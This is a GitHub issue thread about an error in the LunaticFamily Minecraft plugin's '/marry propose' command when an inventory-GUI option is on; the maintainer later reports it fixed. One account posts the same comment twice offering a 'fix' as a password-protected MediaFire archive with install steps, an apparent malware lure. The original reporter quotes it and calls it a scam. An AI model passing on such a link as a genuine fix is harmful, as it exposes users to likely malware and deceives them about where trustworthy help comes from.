### ISSUE TITLE
Velocity Bug

### ISSUE THREAD

**Issue by CCjun6** [Janschuri/LunaticFamily#22]
![image](https://github.com/user-attachments/assets/5508a19b-acdf-4904-9dbb-933fb09f9bc2)

When I set decision_as_inv_gui to true, executing the command /marry propose CC fails and an error occurs

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CCjun6** [comment]
> 要解决您的问题，请尝试下载这个修复程序，我在另一个问题中看到它，https: [//app.mediafire.com/3ag3jpquii3](https://app.mediafire.com/3ag3jpquii3of) 的密码：changeme 当您安装时，您需要在安装路径中放置检查并选择“gcc”。

Are scammers really this low-level nowadays?

**Comment by CCjun6** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Are scammers really this low-level nowadays?

**Comment by Janschuri** [comment]
I've resolved the bug in LunaticFamily v1.2.16 and LunaticLib v1.2.2. Thank you for your patience!
